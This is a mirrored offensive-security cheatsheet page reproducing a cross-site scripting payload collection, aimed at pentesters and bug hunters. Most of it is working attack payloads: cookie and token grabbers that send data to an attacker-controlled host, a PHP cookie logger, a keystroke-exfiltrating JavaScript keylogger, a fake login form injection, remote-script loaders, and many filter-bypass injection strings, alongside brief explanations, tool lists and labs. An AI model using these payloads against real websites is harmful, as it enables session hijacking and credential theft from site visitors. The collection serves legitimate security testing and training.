daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (30005B)


      1 ---
      2 title: "Cross Site Scripting"
      3 topic: "XSS Injection"
      4 topicSlug: "xss-injection"
      5 sourcePath: "XSS Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XSS%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Cross Site Scripting
     12 
     13 > Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
     14 
     15 ## Summary
     16 
     17 - [Methodology](#methodology)
     18 - [Proof of Concept](#proof-of-concept)
     19     - [Data Grabber](#data-grabber)
     20     - [CORS](#cors)
     21     - [UI Redressing](#ui-redressing)
     22     - [Javascript Keylogger](#javascript-keylogger)
     23     - [Other Ways](#other-ways)
     24 - [Identify an XSS Endpoint](#identify-an-xss-endpoint)
     25     - [Tools](#tools)
     26 - [XSS in HTML/Applications](#xss-in-htmlapplications)
     27     - [Common Payloads](#common-payloads)
     28     - [XSS using HTML5 tags](#xss-using-html5-tags)
     29     - [XSS using a Remote JS](#xss-using-a-remote-js)
     30     - [XSS in Hidden Input](#xss-in-hidden-input)
     31     - [XSS in Uppercase Output](#xss-in-uppercase-output)
     32     - [DOM Based XSS](#dom-based-xss)
     33     - [XSS in JS Context](#xss-in-js-context)
     34 - [XSS in Wrappers for URI](#xss-in-wrappers-for-uri)
     35     - [Wrapper javascript:](#wrapper-javascript)
     36     - [Wrapper data:](#wrapper-data)
     37     - [Wrapper vbscript:](#wrapper-vbscript)
     38 - [XSS in Files](#xss-in-files)
     39     - [XSS in XML](#xss-in-xml)
     40     - [XSS in SVG](#xss-in-svg)
     41     - [XSS in Markdown](#xss-in-markdown)
     42     - [XSS in CSS](#xss-in-css)
     43 - [XSS in PostMessage](#xss-in-postmessage)
     44 - [Blind XSS](#blind-xss)
     45     - [XSS Hunter](#xss-hunter)
     46     - [Other Blind XSS tools](#other-blind-xss-tools)
     47     - [Blind XSS endpoint](#blind-xss-endpoint)
     48     - [Tips](#tips)
     49 - [Mutated XSS](#mutated-xss)
     50 - [Labs](#labs)
     51 - [References](#references)
     52 
     53 ## Methodology
     54 
     55 Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
     56 
     57 There are 3 main types of XSS attacks:
     58 
     59 - **Reflected XSS**: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.
     60 
     61 - **Stored XSS**: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.
     62 
     63 - **DOM-based XSS**: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code.
     64 
     65 To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code.
     66 
     67 ## Proof of Concept
     68 
     69 When exploiting an XSS vulnerability, it’s more effective to demonstrate a complete exploitation scenario that could lead to account takeover or sensitive data exfiltration. Instead of simply reporting an XSS with an alert payload, aim to capture valuable data, such as payment information, personal identifiable information (PII), session cookies, or credentials.
     70 
     71 ### Data Grabber
     72 
     73 Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.
     74 
     75 ```html
     76 <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
     77 <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
     78 <script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
     79 <script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
     80 ```
     81 
     82 Write the collected data into a file.
     83 
     84 ```php
     85 <?php
     86 $cookie = $_GET['c'];
     87 $fp = fopen('cookies.txt', 'a+');
     88 fwrite($fp, 'Cookie:' .$cookie."\r\n");
     89 fclose($fp);
     90 ?>
     91 ```
     92 
     93 ### CORS
     94 
     95 ```html
     96 <script>
     97   fetch('https://[ATTACKER.DOMAIN.TLD]', {
     98   method: 'POST',
     99   mode: 'no-cors',
    100   body: document.cookie
    101   });
    102 </script>
    103 ```
    104 
    105 ### UI Redressing
    106 
    107 Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
    108 
    109 ```html
    110 <script>
    111 history.replaceState(null, null, '../../../login');
    112 document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
    113 </script>
    114 ```
    115 
    116 ### Javascript Keylogger
    117 
    118 Another way to collect sensitive data is to set a javascript keylogger.
    119 
    120 ```javascript
    121 <img src=x onerror='document.onkeypress=function(e){fetch("http://[ATTACKER.DOMAIN.TLD]/?k="+String.fromCharCode(e.which))},this.remove();'>
    122 ```
    123 
    124 ### Other Ways
    125 
    126 More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all):
    127 
    128 - [Taking screenshots using XSS and the HTML5 Canvas](https://web.archive.org/web/20120426084546/https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/)
    129 - [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/)
    130 - [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html)
    131 - [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html)
    132 - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html)
    133 - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html)
    134 
    135 ## Identify an XSS Endpoint
    136 
    137 This payload opens the debugger in the developer console rather than triggering a popup alert box.
    138 
    139 ```javascript
    140 <script>debugger;</script>
    141 ```
    142 
    143 Modern applications with content hosting can use [sandbox domains][sandbox-domains]
    144 
    145 > to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data.
    146 
    147 [sandbox-domains]:https://security.googleblog.com/2012/08/content-hosting-for-modern-web.html
    148 
    149 For this reason, it's better to use `alert(document.domain)` or `alert(window.origin)` rather than `alert(1)` as default XSS payload in order to know in which scope the XSS is actually executing.
    150 
    151 Better payload replacing `<script>alert(1)</script>`:
    152 
    153 ```html
    154 <script>alert(document.domain.concat("\n").concat(window.origin))</script>
    155 ```
    156 
    157 While `alert()` is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so `console.log()` can be used instead to display a message in the console of the developer console (doesn't require any interaction).
    158 
    159 Example:
    160 
    161 ```html
    162 <script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
    163 ```
    164 
    165 Additional reading:
    166 
    167 - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
    168 - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
    169 - [LiveOverflow blog post - DO NOT USE alert(1) for XSS](https://liveoverflow.com/do-not-use-alert-1-in-xss/)
    170 
    171 ### Tools
    172 
    173 Most tools are also suitable for blind XSS attacks:
    174 
    175 - [XSSStrike](https://github.com/s0md3v/XSStrike): Very popular but unfortunately not very well maintained
    176 - [xsser](https://github.com/epsylon/xsser): Utilizes a headless browser to detect XSS vulnerabilities
    177 - [Dalfox](https://github.com/hahwul/dalfox): Extensive functionality and extremely fast thanks to the implementation in Go
    178 - [XSpear](https://github.com/hahwul/XSpear): Similar to Dalfox but based on Ruby
    179 - [domdig](https://github.com/fcavallarin/domdig): Headless Chrome XSS Tester
    180 
    181 ## XSS in HTML/Applications
    182 
    183 ### Common Payloads
    184 
    185 ```javascript
    186 // Basic payload
    187 <script>alert('XSS')</script>
    188 <scr<script>ipt>alert('XSS')</scr<script>ipt>
    189 "><script>alert('XSS')</script>
    190 "><script>alert(String.fromCharCode(88,83,83))</script>
    191 <script>\u0061lert('22')</script>
    192 <script>eval('\x61lert(\'33\')')</script>
    193 <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
    194 <object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
    195 
    196 // Img payload
    197 <img src=x onerror=alert('XSS');>
    198 <img src=x onerror=alert('XSS')//
    199 <img src=x onerror=alert(String.fromCharCode(88,83,83));>
    200 <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
    201 <img src=x:alert(alt) onerror=eval(src) alt=xss>
    202 "><img src=x onerror=alert('XSS');>
    203 "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
    204 <><img src=1 onerror=alert(1)>
    205 
    206 // Svg payload
    207 <svgonload=alert(1)>
    208 <svg/onload=alert('XSS')>
    209 <svg onload=alert(1)//
    210 <svg/onload=alert(String.fromCharCode(88,83,83))>
    211 <svg id=alert(1) onload=eval(id)>
    212 "><svg/onload=alert(String.fromCharCode(88,83,83))>
    213 "><svg/onload=alert(/XSS/)
    214 <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
    215 <svg><script>alert('33')
    216 <svg><script>alert&lpar;'33'&rpar;
    217 
    218 // Div payload
    219 <div onpointerover="alert(45)">MOVE HERE</div>
    220 <div onpointerdown="alert(45)">MOVE HERE</div>
    221 <div onpointerenter="alert(45)">MOVE HERE</div>
    222 <div onpointerleave="alert(45)">MOVE HERE</div>
    223 <div onpointermove="alert(45)">MOVE HERE</div>
    224 <div onpointerout="alert(45)">MOVE HERE</div>
    225 <div onpointerup="alert(45)">MOVE HERE</div>
    226 ```
    227 
    228 ### XSS using HTML5 tags
    229 
    230 ```javascript
    231 <body onload=alert(/XSS/.source)>
    232 <input autofocus onfocus=alert(1)>
    233 <select autofocus onfocus=alert(1)>
    234 <textarea autofocus onfocus=alert(1)>
    235 <keygen autofocus onfocus=alert(1)>
    236 <video/poster/onerror=alert(1)>
    237 <video><source onerror="javascript:alert(1)">
    238 <video src=_ onloadstart="alert(1)">
    239 <details/open/ontoggle="alert`1`">
    240 <audio src onloadstart=alert(1)>
    241 <marquee onstart=alert(1)>
    242 <meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
    243 
    244 <body ontouchstart=alert(1)> // Triggers when a finger touch the screen
    245 <body ontouchend=alert(1)>   // Triggers when a finger is removed from touch screen
    246 <body ontouchmove=alert(1)>  // When a finger is dragged across the screen.
    247 ```
    248 
    249 ### XSS using a remote JS
    250 
    251 ```html
    252 <svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
    253 <script src=14.rs>
    254 // you can also specify an arbitrary payload with 14.rs/#payload
    255 e.g: 14.rs/#alert(document.domain)
    256 ```
    257 
    258 ### XSS in Hidden Input
    259 
    260 ```javascript
    261 <input type="hidden" accesskey="X" onclick="alert(1)">
    262 Use CTRL+SHIFT+X to trigger the onclick event
    263 ```
    264 
    265 in newer browsers : firefox-130/chrome-108
    266 
    267 ```javascript
    268 <input type="hidden" oncontentvisibilityautostatechange="alert(1)"  style="content-visibility:auto" >
    269 ```
    270 
    271 ### XSS in Uppercase Output
    272 
    273 ```javascript
    274 <IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
    275 ```
    276 
    277 ### DOM Based XSS
    278 
    279 Based on a DOM XSS sink.
    280 
    281 ```javascript
    282 #"><img src=/ onerror=alert(2)>
    283 ```
    284 
    285 ### XSS in JS Context
    286 
    287 ```javascript
    288 -(confirm)(document.domain)//
    289 ; alert(1);//
    290 // (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
    291 ```
    292 
    293 ## XSS in Wrappers for URI
    294 
    295 ### Wrapper javascript
    296 
    297 ```javascript
    298 javascript:prompt(1)
    299 
    300 %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
    301 
    302 &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
    303 
    304 We can encode the "javascript:" in Hex/Octal
    305 \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
    306 \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
    307 \152\141\166\141\163\143\162\151\160\164\072alert(1)
    308 
    309 We can use a 'newline character'
    310 java%0ascript:alert(1)   - LF (\n)
    311 java%09script:alert(1)   - Horizontal tab (\t)
    312 java%0dscript:alert(1)   - CR (\r)
    313 
    314 Using the escape character
    315 \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
    316 
    317 Using the newline and a comment //
    318 javascript://%0Aalert(1)
    319 javascript://anything%0D%0A%0D%0Awindow.alert(1)
    320 ```
    321 
    322 ### Wrapper data
    323 
    324 ```javascript
    325 data:text/html,<script>alert(0)</script>
    326 data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
    327 <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
    328 ```
    329 
    330 ### Wrapper vbscript
    331 
    332 only IE
    333 
    334 ```javascript
    335 vbscript:msgbox("XSS")
    336 ```
    337 
    338 ## XSS in Files
    339 
    340 **NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
    341 
    342 ```xml
    343 <name>
    344   <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
    345 </name>
    346 ```
    347 
    348 ### XSS in XML
    349 
    350 ```xml
    351 <html>
    352 <head></head>
    353 <body>
    354 <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
    355 </body>
    356 </html>
    357 ```
    358 
    359 ### XSS in SVG
    360 
    361 Simple script. Codename: green triangle
    362 
    363 ```xml
    364 <?xml version="1.0" standalone="no"?>
    365 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    366 
    367 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    368   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    369   <script type="text/javascript">
    370     alert(document.domain);
    371   </script>
    372 </svg>
    373 ```
    374 
    375 More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red ligthning. Author: noraj.
    376 
    377 ```xml
    378 <?xml version="1.0" standalone="no"?>
    379 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    380 
    381 <svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
    382   <polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
    383   <desc><script>alert('svg desc')</script></desc>
    384   <foreignObject><script>alert('svg foreignObject')</script></foreignObject>
    385   <foreignObject width="500" height="500">
    386     <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
    387   </foreignObject>
    388   <title><script>alert('svg title')</script></title>
    389   <animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
    390   <script type="text/javascript">
    391     alert('svg script');
    392   </script>
    393 </svg>
    394 ```
    395 
    396 #### Short SVG Payload
    397 
    398 ```javascript
    399 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
    400 
    401 <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
    402 <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
    403 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
    404 ```
    405 
    406 ### Nesting SVG and XSS
    407 
    408 Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.
    409 
    410 SVG 1.x (xlink:href)
    411 
    412 ```xml
    413 <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    414   <image xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg" height="200" width="200"/>
    415 </svg>
    416 ```
    417 
    418 Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc since the `style` attribute is no longer a vector on modern browsers. Author: noraj.
    419 
    420 SVG 1.x (xlink:href)
    421 
    422 ```xml
    423 <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    424   <use xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg#lightning"/>
    425 </svg>
    426 ```
    427 
    428 However, including svg tags in SVG documents works and allows XSS execution from sub-SVGs. Codename: french flag. Author: noraj.
    429 
    430 ```xml
    431 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    432   <svg x="10">
    433     <rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
    434     <script type="text/javascript">alert('sub-svg 1');</script>
    435   </svg>
    436   <svg x="200">
    437     <rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
    438     <script type="text/javascript">alert('sub-svg 2');</script>
    439   </svg>
    440 </svg>
    441 ```
    442 
    443 ### XSS in Markdown
    444 
    445 ```csharp
    446 [a](javascript:prompt(document.cookie))
    447 [a](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/j%20a%20v%20a%20s%20c%20r%20i%20p%20t%3Aprompt%28document.cookie))
    448 [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
    449 [a](javascript:window.onerror=alert;throw%201)
    450 ```
    451 
    452 ### XSS in CSS
    453 
    454 ```html
    455 <!DOCTYPE html>
    456 <html>
    457 <head>
    458 <style>
    459 div  {
    460     background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    461     background-color: #cccccc;
    462 }
    463 </style>
    464 </head>
    465   <body>
    466     <div>lol</div>
    467   </body>
    468 </html>
    469 ```
    470 
    471 ## XSS in PostMessage
    472 
    473 > If the target origin is asterisk * the message can be sent to any domain has reference to the child page.
    474 
    475 ```html
    476 <html>
    477 <body>
    478     <input type=button value="Click Me" id="btn">
    479 </body>
    480 
    481 <script>
    482 document.getElementById('btn').onclick = function(e){
    483     window.poc = window.open('http://10.10.10.10/#login');
    484     setTimeout(function(){
    485         window.poc.postMessage(
    486             {
    487                 "sender": "accounts",
    488                 "url": "javascript:confirm('XSS')",
    489             },
    490             '*'
    491         );
    492     }, 2000);
    493 }
    494 </script>
    495 </html>
    496 ```
    497 
    498 ## Blind XSS
    499 
    500 ### XSS Hunter
    501 
    502 > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
    503 
    504 XSS Hunter is deprecated, it was available at [https://xsshunter.com](https://web.archive.org/web/20180528161032/https://xsshunter.com/features).
    505 
    506 You can set up an alternative version.
    507 
    508 - Self-hosted version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express)
    509 - Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
    510 
    511 ```xml
    512 "><script src="https://js.rip/[ATTACKER.DOMAIN.TLD]"></script>
    513 "><script src=//[ATTACKER.DOMAIN.TLD]></script>
    514 <script>$.getScript("//[ATTACKER.DOMAIN.TLD]")</script>
    515 ```
    516 
    517 ### Other Blind XSS tools
    518 
    519 - [Netflix-Skunkworks/sleepy-puppy](https://github.com/Netflix-Skunkworks/sleepy-puppy) - Sleepy Puppy XSS Payload Management Framework
    520 - [LewisArdern/bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
    521 - [ssl/ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
    522 
    523 ### Blind XSS endpoint
    524 
    525 - Contact forms
    526 - Ticket support
    527 - Referer Header
    528     - Custom Site Analytics
    529     - Administrative Panel logs
    530 - User Agent
    531     - Custom Site Analytics
    532     - Administrative Panel logs
    533 - Comment Box
    534     - Administrative Panel
    535 
    536 ### Tips
    537 
    538 You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
    539 
    540 Eg. payload
    541 
    542 ```html
    543 <script>document.location='http://[ATTACKER.DOMAIN.TLD]/XSS/grabber.php?c='+document.domain</script>
    544 ```
    545 
    546 Eg. one-line HTTP server:
    547 
    548 ```ps1
    549 ruby -run -ehttpd . -p8080
    550 ```
    551 
    552 ## Mutated XSS
    553 
    554 Use browsers quirks to recreate some HTML tags.
    555 
    556 **Example**: Mutated XSS from Masato Kinugawa, used against [cure53/DOMPurify](https://github.com/cure53/DOMPurify) component on Google Search.
    557 
    558 ```javascript
    559 <noscript><p title="</noscript><img src=x onerror=alert(1)>">
    560 ```
    561 
    562 ## Labs
    563 
    564 - [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
    565 - [Root Me - XSS - Reflected](https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected)
    566 - [Root Me - XSS - Server Side](https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side)
    567 - [Root Me - XSS - Stored 1](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1)
    568 - [Root Me - XSS - Stored 2](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2)
    569 - [Root Me - XSS - Stored - Filter Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)
    570 - [Root Me - XSS DOM Based - Introduction](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction)
    571 - [Root Me - XSS DOM Based - AngularJS](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS)
    572 - [Root Me - XSS DOM Based - Eval](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval)
    573 - [Root Me - XSS DOM Based - Filters Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass)
    574 - [Root Me - XSS - DOM Based](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based)
    575 - [Root Me - Self XSS - DOM Secrets](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets)
    576 - [Root Me - Self XSS - Race Condition](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition)
    577 
    578 ## References
    579 
    580 - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) - Masato Kinugawa's (@kinugawamasato) - July 15, 2016](https://web.archive.org/web/20260208084714/https://mksben.l0.cm/2016/07/xxn-caret.html)
    581 - [Account Recovery XSS - Gábor Molnár - April 13, 2016](https://web.archive.org/web/20241005040655/https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss)
    582 - [An XSS on Facebook via PNGs & Wonky Content Types - Jack Whitton (@fin1te) - January 27, 2016](https://web.archive.org/web/20171108050241/https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
    583 - [Bypassing Signature-Based XSS Filters: Modifying Script Code - PortSwigger - August 4, 2020](https://web.archive.org/web/20251008035916/https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
    584 - [Combination of techniques lead to DOM Based XSS in Google - Sasi Levi - September 19, 2016](https://web.archive.org/web/20180214031830/https://sasi2103.blogspot.sg:80/2016/09/combination-of-techniques-lead-to-dom.html)
    585 - [Cross-site scripting (XSS) cheat sheet - PortSwigger - September 27, 2019](https://web.archive.org/web/20190927102245/https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
    586 - [Encoding Differentials: Why Charset Matters - Stefan Schiller - July 15, 2024](https://web.archive.org/web/20240715192800/https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/)
    587 - [Facebook's Moves - OAuth XSS - Paulos Yibelo - December 10, 2015](https://web.archive.org/web/20180508031244/https://www.paulosyibelo.com:80/2015/12/facebooks-moves-oauth-xss.html)
    588 - [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://web.archive.org/web/20231004090825/https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/)
    589 - [Google XSS Turkey - Frans Rosén - June 6, 2015](https://web.archive.org/web/20231004100309/https://labs.detectify.com/2015/06/06/google-xss-turkey/)
    590 - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://web.archive.org/web/20260304011652/https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff)
    591 - [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - September 26, 2014](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
    592 - [Mutation XSS in Google Search -  Tomasz Andrzej Nidecki - April 10, 2019](https://web.archive.org/web/20260305093221/https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
    593 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://web.archive.org/web/20250901044759/https://cure53.de/fp170.pdf)
    594 - [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://web.archive.org/web/20231004103135/https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
    595 - [RPO that lead to information leakage in Google - @filedescriptor - July 3, 2016](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/)
    596 - [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - May 13, 2024](https://web.archive.org/web/20260105121400/https://youtu.be/Sm4G6cAHjWM)
    597 - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - Frans Rosén (fransrosen) - February 17, 2017](https://web.archive.org/web/20251111110702/https://hackerone.com/reports/207042)
    598 - [Stored XSS affecting all fantasy sports [*.fantasysports.yahoo.com] - thedawgyg - December 7, 2016](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/)
    599 - [Stored XSS in *.ebay.com - Jack Whitton (@fin1te) - January 27, 2013](https://web.archive.org/web/20260117011606/https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/)
    600 - [Stored XSS In Facebook Chat, Check In, Facebook Messenger - Nirgoldshlager - April 17, 2013](http://web.archive.org/web/20130420095223/http://www.breaksec.com/?p=6129)
    601 - [Stored XSS on developer.uber.com via admin account compromise in Uber - James Kettle (@albinowax) - July 18, 2016](https://web.archive.org/web/20251219005750/https://hackerone.com/reports/152067)
    602 - [Stored XSS on Snapchat - Mrityunjoy - February 9, 2018](https://web.archive.org/web/20250117225022/https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
    603 - [Stored XSS, and SSRF in Google using the Dataset Publishing Language - Craig Arendt - March 7, 2018](https://web.archive.org/web/20180307213445/https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
    604 - [Tricky HTML Injection and Possible XSS in sms-be-vip.twitter.com - Ahmed Aboul-Ela (@aboul3la) - July 9, 2016](https://web.archive.org/web/20250705123701/https://hackerone.com/reports/150179)
    605 - [Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov (bobrov) - September 30, 2017](https://web.archive.org/web/20251206162237/https://hackerone.com/reports/260744)
    606 - [Uber Bug Bounty: Turning Self-XSS into Good XSS - Jack Whitton (@fin1te) - March 22, 2016](https://web.archive.org/web/20260301051605/https://whitton.io/articles/uber-turning-self-xss-into-good-xss/)
    607 - [Uber Self XSS to Global XSS - httpsonly - August 29, 2016](https://web.archive.org/web/20180701015455/https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html)
    608 - [Unleashing an Ultimate XSS Polyglot - Ahmed Elsobky - February 16, 2018](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
